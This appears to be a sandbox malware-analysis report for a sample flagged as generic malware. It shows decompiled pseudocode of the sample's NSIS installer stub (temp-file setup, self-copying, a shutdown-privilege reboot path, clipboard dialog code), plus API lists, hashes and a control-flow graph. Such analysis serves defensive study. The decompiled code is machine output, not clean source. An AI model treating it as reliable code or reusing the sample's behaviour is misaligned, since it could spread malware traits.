                                                              				while(1) {
                                                              					_t97 =  *_t199;
                                                              					_t252 = _t97 - _t189;
                                                              					if(_t97 == _t189) {
                                                              						break;
                                                              					}
                                                              					_t210 = 0x20;
                                                              					__eflags = _t97 - _t210;
                                                              					if(_t97 != _t210) {
                                                              						L17:
                                                              						__eflags =  *_t199 - _t234;
                                                              						_v12 = _t210;
                                                              						if( *_t199 == _t234) {
                                                              							_v12 = _t234;
                                                              							_t199 = _t199 + 2;
                                                              							__eflags = _t199;
                                                              						}
                                                              						__eflags =  *_t199 - 0x2f;
                                                              						if( *_t199 != 0x2f) {
                                                              							L32:
                                                              							_t199 = E00405F64(_t199, _v12);
                                                              							__eflags =  *_t199 - _t234;
                                                              							if(__eflags == 0) {
                                                              								_t199 = _t199 + 2;
                                                              								__eflags = _t199;
                                                              							}
                                                              							continue;
                                                              						} else {
                                                              							_t199 = _t199 + 2;
                                                              							__eflags =  *_t199 - 0x53;
                                                              							if( *_t199 != 0x53) {
                                                              								L24:
                                                              								asm("cdq");
                                                              								asm("cdq");
                                                              								_t215 = L"NCRC" & 0x0000ffff;
                                                              								asm("cdq");
                                                              								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
                                                              								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
                                                              								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
                                                              									L29:
                                                              									asm("cdq");
                                                              									asm("cdq");
                                                              									_t210 = L" /D=" & 0x0000ffff;
                                                              									asm("cdq");
                                                              									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
                                                              									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
                                                              									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
                                                              										L31:
                                                              										_t234 = 0x22;
                                                              										goto L32;
                                                              									}
                                                              									__eflags =  *_t199 - _t230;
                                                              									if( *_t199 == _t230) {
                                                              										 *(_t199 - 4) = _t189;
                                                              										__eflags = _t199;
                                                              										E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
                                                              										L37:
                                                              										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                              										GetTempPathW(0x400, _t235);
                                                              										_t116 = E0040360F(_t199, _t252);
                                                              										_t253 = _t116;
                                                              										if(_t116 != 0) {
                                                              											L40:
                                                              											DeleteFileW(L"1033"); // executed
                                                              											_t118 = E004030D0(_t255, _v20); // executed
                                                              											_v8 = _t118;
                                                              											if(_t118 != _t189) {
                                                              												L68:
                                                              												E00403C25();
                                                              												__imp__OleUninitialize();
                                                              												if(_v8 == _t189) {
                                                              													if( *0x42a2f4 == _t189) {
                                                              														L77:
                                                              														_t120 =  *0x42a30c;
                                                              														if(_t120 != 0xffffffff) {
                                                              															_v24 = _t120;
                                                              														}
                                                              														ExitProcess(_v24);
                                                              													}
                                                              													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                              														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                              														_v40.PrivilegeCount = 1;
                                                              														_v28 = 2;
                                                              														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                              													}
                                                              													_t124 = E00406A35(4);
                                                              													if(_t124 == _t189) {
                                                              														L75:
                                                              														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                              															goto L77;
                                                              														}
                                                              														goto L76;
                                                              													} else {
                                                              														_push(0x80040002);
                                                              														_push(0x25);
                                                              														_push(_t189);
                                                              														_push(_t189);
                                                              														_push(_t189);
                                                              														if( *_t124() == 0) {
                                                              															L76:
                                                              															E0040140B(9);
                                                              															goto L77;
                                                              														}
                                                              														goto L75;
                                                              													}
                                                              												}
                                                              												E00405CC8(_v8, 0x200010);
                                                              												ExitProcess(2);
                                                              											}
                                                              											if( *0x42a27c == _t189) {
                                                              												L51:
                                                              												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                              												_v24 = E00403D17(_t265);
                                                              												goto L68;
                                                              											}
                                                              											_t219 = E00405F64(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe\" ", _t189);
                                                              											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe\" ") {
                                                              												L48:
                                                              												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe\" ";
                                                              												_v8 = L"Error launching installer";
                                                              												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe\" ") {
                                                              													_t190 = E00405C33(__eflags);
                                                              													lstrcatW(_t235, L"~nsu");
                                                              													__eflags = _t190;
                                                              													if(_t190 != 0) {
                                                              														lstrcatW(_t235, "A");
                                                              													}
                                                              													lstrcatW(_t235, L".tmp");
                                                              													_t220 = L"C:\\Users\\Arthur\\Desktop";
                                                              													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
                                                              													__eflags = _t138;
                                                              													if(_t138 == 0) {
                                                              														L67:
                                                              														_t189 = 0;
                                                              														__eflags = 0;
                                                              														goto L68;
                                                              													} else {
                                                              														__eflags = _t190;
                                                              														_push(_t235);
                                                              														if(_t190 == 0) {
                                                              															E00405C16();
                                                              														} else {
                                                              															E00405B99();
                                                              														}
                                                              														SetCurrentDirectoryW(_t235);
                                                              														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
                                                              														if(__eflags == 0) {
                                                              															E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t220);
                                                              														}
                                                              														E00406668(0x42b000, _v16);
                                                              														_t202 = "A" & 0x0000ffff;
                                                              														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                              														__eflags = _t144;
                                                              														_v12 = 0x1a;
                                                              														 *0x42b800 = _t144;
                                                              														do {
                                                              															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                              															DeleteFileW(0x420f08);
                                                              															__eflags = _v8;
                                                              															if(_v8 != 0) {
                                                              																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe", 0x420f08, 1);
                                                              																__eflags = _t149;
                                                              																if(_t149 != 0) {
                                                              																	E00406428(_t202, 0x420f08, 0);
                                                              																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                              																	_t153 = E00405C4B(0x420f08);
                                                              																	__eflags = _t153;
                                                              																	if(_t153 != 0) {
                                                              																		CloseHandle(_t153);
                                                              																		_v8 = 0;
                                                              																	}
                                                              																}
                                                              															}
                                                              															 *0x42b800 =  *0x42b800 + 1;
                                                              															_t61 =  &_v12;
                                                              															 *_t61 = _v12 - 1;
                                                              															__eflags =  *_t61;
                                                              														} while ( *_t61 != 0);
                                                              														E00406428(_t202, _t235, 0);
                                                              														goto L67;
                                                              													}
                                                              												}
                                                              												 *_t219 = _t189;
                                                              												_t222 =  &(_t219[2]);
                                                              												_t158 = E0040603F(_t264,  &(_t219[2]));
                                                              												_t265 = _t158;
                                                              												if(_t158 == 0) {
                                                              													goto L68;
                                                              												}
                                                              												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                              												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                              												_v8 = _t189;
                                                              												goto L51;
                                                              											}
                                                              											asm("cdq");
                                                              											asm("cdq");
                                                              											asm("cdq");
                                                              											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                              											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                              											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                              												_t219 = _t219;
                                                              												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe\" ") {
                                                              													continue;
                                                              												}
                                                              												break;
                                                              											}
                                                              											_t189 = 0;
                                                              											goto L48;
                                                              										}
                                                              										GetWindowsDirectoryW(_t235, 0x3fb);
                                                              										lstrcatW(_t235, L"\\Temp");
                                                              										_t171 = E0040360F(_t199, _t253);
                                                              										_t254 = _t171;
                                                              										if(_t171 != 0) {
                                                              											goto L40;
                                                              										}
                                                              										GetTempPathW(0x3fc, _t235);
                                                              										lstrcatW(_t235, L"Low");
                                                              										SetEnvironmentVariableW(L"TEMP", _t235);
                                                              										SetEnvironmentVariableW(L"TMP", _t235);
                                                              										_t176 = E0040360F(_t199, _t254);
                                                              										_t255 = _t176;
                                                              										if(_t176 == 0) {
                                                              											goto L68;
                                                              										}
                                                              										goto L40;
                                                              									}
                                                              									goto L31;
                                                              								}
                                                              								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                              								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                              									goto L29;
                                                              								}
                                                              								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                              								__eflags = _t178 - 0x20;
                                                              								if(_t178 == 0x20) {
                                                              									L28:
                                                              									_t36 =  &_v20;
                                                              									 *_t36 = _v20 | 0x00000004;
                                                              									__eflags =  *_t36;
                                                              									goto L29;
                                                              								}
                                                              								__eflags = _t178 - _t189;
                                                              								if(_t178 != _t189) {
                                                              									goto L29;
                                                              								}
                                                              								goto L28;
                                                              							}
                                                              							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                              							__eflags = _t179 - _t210;
                                                              							if(_t179 == _t210) {
                                                              								L23:
                                                              								 *0x42a300 = 1;
                                                              								goto L24;
                                                              							}
                                                              							__eflags = _t179 - _t189;
                                                              							if(_t179 != _t189) {
                                                              								goto L24;
                                                              							}
                                                              							goto L23;
                                                              						}
                                                              					} else {
                                                              						goto L16;
                                                              					}
                                                              					do {
                                                              						L16:
                                                              						_t199 = _t199 + 2;
                                                              						__eflags =  *_t199 - _t210;
                                                              					} while ( *_t199 == _t210);
                                                              					goto L17;
                                                              				}
                                                              				goto L37;
                                                              			}



















































                                                              0x0040364e
                                                              0x0040364f
                                                              0x00403656
                                                              0x00403659
                                                              0x00403660
                                                              0x00403663
                                                              0x00403676
                                                              0x0040367c
                                                              0x0040367f
                                                              0x00403682
                                                              0x00403690
                                                              0x00403698
                                                              0x004036a3
                                                              0x004036bc
                                                              0x004036be
                                                              0x004036c6
                                                              0x004036c6
                                                              0x004036d1
                                                              0x004036d3
                                                              0x004036d3
                                                              0x004036e8
                                                              0x0040370d
                                                              0x0040371b
                                                              0x0040371e
                                                              0x00403725
                                                              0x0040372c
                                                              0x0040372c
                                                              0x00403725
                                                              0x0040372e
                                                              0x00403733
                                                              0x00403734
                                                              0x00403740
                                                              0x00403744
                                                              0x0040374b
                                                              0x00403759
                                                              0x0040375e
                                                              0x00403765
                                                              0x00403769
                                                              0x0040376d
                                                              0x0040376f
                                                              0x0040376f
                                                              0x0040376d
                                                              0x00403776
                                                              0x0040377d
                                                              0x00403783
                                                              0x0040379b
                                                              0x004037ab
                                                              0x004037b0
                                                              0x004037b6
                                                              0x004037bd
                                                              0x004037c4
                                                              0x004037c6
                                                              0x004037c7
                                                              0x004037d1
                                                              0x004037d8
                                                              0x004037da
                                                              0x004037dc
                                                              0x004037dc
                                                              0x004037ef
                                                              0x004037f1
                                                              0x004038eb
                                                              0x004038eb
                                                              0x004038ee
                                                              0x004038f1
                                                              0x00000000
                                                              0x00000000
                                                              0x004037fb
                                                              0x004037fc
                                                              0x004037ff
                                                              0x00403808
                                                              0x00403808
                                                              0x0040380b
                                                              0x0040380e
                                                              0x00403811
                                                              0x00403814
                                                              0x00403814
                                                              0x00403814
                                                              0x00403815
                                                              0x00403819
                                                              0x004038d9
                                                              0x004038e2
                                                              0x004038e4
                                                              0x004038e7
                                                              0x004038ea
                                                              0x004038ea
                                                              0x004038ea
                                                              0x00000000
                                                              0x0040381f
                                                              0x00403820
                                                              0x00403821
                                                              0x00403825
                                                              0x0040383f
                                                              0x00403846
                                                              0x00403859
                                                              0x0040385a
                                                              0x0040386f
                                                              0x00403874
                                                              0x00403876
                                                              0x00403878
                                                              0x00403894
                                                              0x0040389b
                                                              0x004038ae
                                                              0x004038af
                                                              0x004038c4
                                                              0x004038ca
                                                              0x004038cc
                                                              0x004038ce
                                                              0x004038d6
                                                              0x004038d8
                                                              0x00000000
                                                              0x004038d8
                                                              0x004038d2
                                                              0x004038d4
                                                              0x004038f9
                                                              0x004038fd
                                                              0x00403906
                                                              0x0040390b
                                                              0x00403911
                                                              0x0040391c
                                                              0x0040391e
                                                              0x00403923
                                                              0x00403925
                                                              0x0040397d
                                                              0x00403982
                                                              0x0040398b
                                                              0x00403992
                                                              0x00403995
                                                              0x00403b6c
                                                              0x00403b6c
                                                              0x00403b71
                                                              0x00403b7a
                                                              0x00403b97
                                                              0x00403c0f
                                                              0x00403c0f
                                                              0x00403c17
                                                              0x00403c19
                                                              0x00403c19
                                                              0x00403c1f
                                                              0x00403c1f
                                                              0x00403bae
                                                              0x00403bba
                                                              0x00403bcb
                                                              0x00403bd2
                                                              0x00403bd9
                                                              0x00403bd9
                                                              0x00403be1
                                                              0x00403bed
                                                              0x00403bfb
                                                              0x00403c06
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403bef
                                                              0x00403bef
                                                              0x00403bf0
                                                              0x00403bf2
                                                              0x00403bf3
                                                              0x00403bf4
                                                              0x00403bf9
                                                              0x00403c08
                                                              0x00403c0a
                                                              0x00000000
                                                              0x00403c0a
                                                              0x00000000
                                                              0x00403bf9
                                                              0x00403bed
                                                              0x00403b84
                                                              0x00403b8b
                                                              0x00403b8b
                                                              0x004039a1
                                                              0x00403a48
                                                              0x00403a48
                                                              0x00403a54
                                                              0x00000000
                                                              0x00403a54
                                                              0x004039b2
                                                              0x004039ba
                                                              0x00403a0c
                                                              0x00403a0c
                                                              0x00403a12
                                                              0x00403a19
                                                              0x00403a67
                                                              0x00403a69
                                                              0x00403a6e
                                                              0x00403a70
                                                              0x00403a78
                                                              0x00403a78
                                                              0x00403a83
                                                              0x00403a88
                                                              0x00403a8f
                                                              0x00403a95
                                                              0x00403a97
                                                              0x00403b6a
                                                              0x00403b6a
                                                              0x00403b6a
                                                              0x00000000
                                                              0x00403a9d
                                                              0x00403a9d
                                                              0x00403a9f
                                                              0x00403aa0
                                                              0x00403aa9
                                                              0x00403aa2
                                                              0x00403aa2
                                                              0x00403aa2
                                                              0x00403aaf
                                                              0x00403ab7
                                                              0x00403abe
                                                              0x00403ac6
                                                              0x00403ac6
                                                              0x00403ad3
                                                              0x00403adf
                                                              0x00403ae9
                                                              0x00403ae9
                                                              0x00403aeb
                                                              0x00403af2
                                                              0x00403afc
                                                              0x00403b08
                                                              0x00403b0e
                                                              0x00403b14
                                                              0x00403b17
                                                              0x00403b21
                                                              0x00403b27
                                                              0x00403b29
                                                              0x00403b2d
                                                              0x00403b3e
                                                              0x00403b44
                                                              0x00403b49
                                                              0x00403b4b
                                                              0x00403b4e
                                                              0x00403b54
                                                              0x00403b54
                                                              0x00403b4b
                                                              0x00403b29
                                                              0x00403b57
                                                              0x00403b5e
                                                              0x00403b5e
                                                              0x00403b5e
                                                              0x00403b5e
                                                              0x00403b65
                                                              0x00000000
                                                              0x00403b65
                                                              0x00403a97
                                                              0x00403a1b
                                                              0x00403a1e
                                                              0x00403a22
                                                              0x00403a27
                                                              0x00403a29
                                                              0x00000000
                                                              0x00000000
                                                              0x00403a35
                                                              0x00403a40
                                                              0x00403a45
                                                              0x00000000
                                                              0x00403a45
                                                              0x004039c3
                                                              0x004039db
                                                              0x004039ec
                                                              0x004039ed
                                                              0x004039f1
                                                              0x004039f3
                                                              0x00403a01
                                                              0x00403a08
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403a08
                                                              0x00403a0a
                                                              0x00000000
                                                              0x00403a0a
                                                              0x0040392d
                                                              0x00403939
                                                              0x0040393e
                                                              0x00403943
                                                              0x00403945
                                                              0x00000000
                                                              0x00000000
                                                              0x0040394d
                                                              0x00403955
                                                              0x00403966
                                                              0x0040396e
                                                              0x00403970
                                                              0x00403975
                                                              0x00403977
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403977
                                                              0x00000000
                                                              0x004038d4
                                                              0x0040387d
                                                              0x0040387f
                                                              0x00000000
                                                              0x00000000
                                                              0x00403881
                                                              0x00403885
                                                              0x00403889
                                                              0x00403890
                                                              0x00403890
                                                              0x00403890
                                                              0x00403890
                                                              0x00000000
                                                              0x00403890
                                                              0x0040388b
                                                              0x0040388e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040388e
                                                              0x00403827
                                                              0x0040382b
                                                              0x0040382e
                                                              0x00403835
                                                              0x00403835
                                                              0x00000000
                                                              0x00403835
                                                              0x00403830
                                                              0x00403833
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403833
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403801
                                                              0x00403801
                                                              0x00403802
                                                              0x00403803
                                                              0x00403803
                                                              0x00000000
                                                              0x00403801
                                                              0x00000000

                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                              • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                              • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                              • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                              • OleInitialize.OLE32(00000000), ref: 0040377D
                                                              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                              • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" ,00000000), ref: 004037E9
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" ,00000000,?), ref: 00403A8F
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                              • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,00420F08,00000001), ref: 00403B21
                                                              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                              • OleUninitialize.OLE32(?), ref: 00403B71
                                                              • ExitProcess.KERNEL32 ref: 00403B8B
                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                              • ExitProcess.KERNEL32 ref: 00403C1F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                              • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                              • API String ID: 3859024572-725250621
                                                              • Opcode ID: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
                                                              • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                              • Opcode Fuzzy Hash: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
                                                              • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 143 405809-405824 144 4059b3-4059ba 143->144 145 40582a-4058f1 GetDlgItem * 3 call 4045f9 call 404f52 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 146 4059e4-4059f1 144->146 147 4059bc-4059de GetDlgItem CreateThread CloseHandle 144->147 163 4058f3-40590d SendMessageW * 2 145->163 164 40590f-405912 145->164 149 4059f3-4059f9 146->149 150 405a0f-405a19 146->150 147->146 153 405a34-405a3d call 40462b 149->153 154 4059fb-405a0a ShowWindow * 2 call 4045f9 149->154 155 405a1b-405a21 150->155 156 405a6f-405a73 150->156 167 405a42-405a46 153->167 154->150 160 405a23-405a2f call 40459d 155->160 161 405a49-405a59 ShowWindow 155->161 156->153 158 405a75-405a7b 156->158 158->153 165 405a7d-405a90 SendMessageW 158->165 160->153 168 405a69-405a6a call 40459d 161->168 169 405a5b-405a64 call 4056ca 161->169 163->164 171 405922-405939 call 4045c4 164->171 172 405914-405920 SendMessageW 164->172 173 405b92-405b94 165->173 174 405a96-405ac1 CreatePopupMenu call 4066a5 AppendMenuW 165->174 168->156 169->168 182 40593b-40594f ShowWindow 171->182 183 40596f-405990 GetDlgItem SendMessageW 171->183 172->171 173->167 180 405ac3-405ad3 GetWindowRect 174->180 181 405ad6-405aeb TrackPopupMenu 174->181 180->181 181->173 184 405af1-405b08 181->184 185 405951-40595c ShowWindow 182->185 186 40595e 182->186 183->173 187 405996-4059ae SendMessageW * 2 183->187 188 405b0d-405b28 SendMessageW 184->188 189 405964-40596a call 4045f9 185->189 186->189 187->173 188->188 190 405b2a-405b4d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405b4f-405b76 SendMessageW 190->192 192->192 193 405b78-405b8c GlobalUnlock SetClipboardData CloseClipboard 192->193 193->173
                                                              C-Code - Quality: 95%
                                                              			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                              				struct HWND__* _v8;
                                                              				long _v12;
                                                              				struct tagRECT _v28;
                                                              				void* _v36;
                                                              				signed int _v40;
                                                              				int _v44;
                                                              				int _v48;
                                                              				signed int _v52;
                                                              				int _v56;
                                                              				void* _v60;
                                                              				void* _v68;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				struct HWND__* _t94;
                                                              				long _t95;
                                                              				int _t100;
                                                              				void* _t108;
                                                              				intOrPtr _t119;
                                                              				void* _t127;
                                                              				intOrPtr _t130;
                                                              				struct HWND__* _t134;
                                                              				int _t156;
                                                              				int _t159;
                                                              				struct HMENU__* _t164;
                                                              				struct HWND__* _t168;
                                                              				struct HWND__* _t169;
                                                              				int _t171;
                                                              				void* _t172;
                                                              				short* _t173;
                                                              				short* _t175;
                                                              				int _t177;
                                                              
                                                              				_t169 =  *0x429244;
                                                              				_t156 = 0;
                                                              				_v8 = _t169;
                                                              				if(_a8 != 0x110) {
                                                              					if(_a8 == 0x405) {
                                                              						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                              						CloseHandle(_t127); // executed
                                                              					}
                                                              					if(_a8 != 0x111) {
                                                              						L17:
                                                              						_t171 = 1;
                                                              						if(_a8 != 0x404) {
                                                              							L25:
                                                              							if(_a8 != 0x7b) {
                                                              								goto L20;
                                                              							}
                                                              							_t94 = _v8;
                                                              							if(_a12 != _t94) {
                                                              								goto L20;
                                                              							}
                                                              							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                              							_a8 = _t95;
                                                              							if(_t95 <= _t156) {
                                                              								L36:
                                                              								return 0;
                                                              							}
                                                              							_t164 = CreatePopupMenu();
                                                              							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                              							_t100 = _a16;
                                                              							_t159 = _a16 >> 0x10;
                                                              							if(_a16 == 0xffffffff) {
                                                              								GetWindowRect(_v8,  &_v28);
                                                              								_t100 = _v28.left;
                                                              								_t159 = _v28.top;
                                                              							}
                                                              							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                              								_v60 = _t156;
                                                              								_v48 = 0x423748;
                                                              								_v44 = 0x1000;
                                                              								_a4 = _a8;
                                                              								do {
                                                              									_a4 = _a4 - 1;
                                                              									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                              								} while (_a4 != _t156);
                                                              								OpenClipboard(_t156);
                                                              								EmptyClipboard();
                                                              								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                              								_a4 = _t108;
                                                              								_t172 = GlobalLock(_t108);
                                                              								do {
                                                              									_v48 = _t172;
                                                              									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                              									 *_t173 = 0xd;
                                                              									_t175 = _t173 + 2;
                                                              									 *_t175 = 0xa;
                                                              									_t172 = _t175 + 2;
                                                              									_t156 = _t156 + 1;
                                                              								} while (_t156 < _a8);
                                                              								GlobalUnlock(_a4);
                                                              								SetClipboardData(0xd, _a4);
                                                              								CloseClipboard();
                                                              							}
                                                              							goto L36;
                                                              						}
                                                              						if( *0x42922c == _t156) {
                                                              							ShowWindow( *0x42a268, 8);
                                                              							if( *0x42a2ec == _t156) {
                                                              								_t119 =  *0x422720; // 0x59d07c
                                                              								E004056CA( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                              							}
                                                              							E0040459D(_t171);
                                                              							goto L25;
                                                              						}
                                                              						 *0x421f18 = 2;
                                                              						E0040459D(0x78);
                                                              						goto L20;
                                                              					} else {
                                                              						if(_a12 != 0x403) {
                                                              							L20:
                                                              							return E0040462B(_a8, _a12, _a16);
